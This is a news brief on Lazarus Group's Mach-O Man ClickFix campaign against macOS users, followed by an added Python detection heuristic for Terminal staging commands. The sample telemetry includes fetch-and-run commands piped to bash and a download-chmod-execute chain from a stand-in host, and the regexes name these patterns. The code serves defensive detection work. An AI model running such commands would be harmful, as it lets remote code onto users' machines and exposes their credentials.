New Mach-O Man malware tapped by Lazarus in macOS-targeted ClickFix attacks

Senior fintech and cryptocurrency professionals, including executives and developers, have had their macOS environments targeted by the North Korean hacking collective Lazarus Group with the new Mach-O Man malware kit in a new ClickFix campaign, reports GBHackers News.

Attacks commenced with the delivery of urgent meeting invites purportedly from business contacts or colleagues, containing links that divert to fake Microsoft Teams, Zoom, or Google Meet websites. These sites display a connection issue that supposedly requires running a command in Terminal to resolve, according to an analysis by BCA LTD founder Mauro Eldritch. Running the command launches the initial staging binary, which retrieves bogus macOS apps that seek to obtain targets' credentials, while a secondary module profiles the system to collect OS details, host identifiers, network configuration data, and browser extension information, before the macrasv2 stealer is eventually injected. Aside from stealing browser-stored credentials and cookies, the stealer also exfiltrates Keychain secrets and other files that would enable breaches of software-as-a-service platforms. While the Mach-O Man kit is poorly written, organizations' network defenders have still been urged to reinforce defenses against ClickFix-style lures.
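The ClickFix chain above hinges on a user pasting a command into Terminal that fetches and runs a staging binary. The following detection heuristic is an added example, not code from the article or from the researchers it cites: it scans normalised process-execution events (the `ts`, `session`, `parent` and `cmdline` field names are assumptions) for a download piped into a shell, or a download-to-file followed shortly by a chmod-and-execute in the same Terminal session. The patterns are generic heuristics; the article does not disclose the actual Mach-O Man command, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Only commands spawned from a terminal app are of interest here, because the
# ClickFix lure asks the victim to run the command in Terminal themselves.
TERMINAL_APPS = {"Terminal", "iTerm2"}
# How long after a download-to-file a chmod/execute still counts as staging.
STAGE_WINDOW = timedelta(minutes=5)

# Heuristic patterns (assumed, not IoCs from the article):
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b", re.I)
DECODE_PIPE = re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba|z)?sh\b", re.I)
FETCH_FILE = re.compile(r"\b(curl|wget)\b.*\s-[oO]\s*\S+", re.I)
MAKE_EXEC = re.compile(r"chmod\s+\+x\s+\S+.*?(&&|;)\s*(\./|/|open\s)", re.I)


def flag_clickfix(events):
    """Return (ts, reason, cmdline) findings for suspicious terminal commands.

    A command is flagged when it pipes a fetched or decoded payload straight into a
    shell, or when it makes a file executable and runs it within STAGE_WINDOW of a
    download-to-file in the same session (the two-step staging flow).
    """
    findings = []
    last_fetch = {}  # session id -> timestamp of the most recent download-to-file
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["parent"] not in TERMINAL_APPS:
            continue
        ts = datetime.fromisoformat(ev["ts"])
        cmd = ev["cmdline"]
        if FETCH_PIPE.search(cmd) or DECODE_PIPE.search(cmd):
            findings.append((ev["ts"], "download-or-decode piped into shell", cmd))
        elif FETCH_FILE.search(cmd):
            last_fetch[ev["session"]] = ts
        elif MAKE_EXEC.search(cmd):
            prev = last_fetch.get(ev["session"])
            if prev is not None and ts - prev <= STAGE_WINDOW:
                findings.append((ev["ts"], "fetched file made executable and run", cmd))
    return findings


SAMPLE_EVENTS = [  # constructed telemetry, not real data
    {"ts": "2024-01-01T09:00:05", "session": "s1", "parent": "Terminal",
     "cmdline": "curl -fsSL https://meeting-fix.invalid/repair.sh | bash"},
    {"ts": "2024-01-01T09:01:10", "session": "s2", "parent": "Terminal",
     "cmdline": "curl -s -o /tmp/.stage https://meeting-fix.invalid/stage"},
    {"ts": "2024-01-01T09:01:40", "session": "s2", "parent": "Terminal",
     "cmdline": "chmod +x /tmp/.stage && /tmp/.stage"},
    {"ts": "2024-01-01T09:02:00", "session": "s3", "parent": "Terminal",
     "cmdline": "git pull --rebase"},
    {"ts": "2024-01-01T10:30:00", "session": "s4", "parent": "Terminal",
     "cmdline": "chmod +x build.sh && ./build.sh"},  # no prior fetch: not flagged
]

if __name__ == "__main__":
    for finding in flag_clickfix(SAMPLE_EVENTS):
        print(*finding, sep=" | ")
```

Tuning the window and parent set to your own EDR's field names and baseline is expected; the point is correlating the fetch with the execute, not matching any single command.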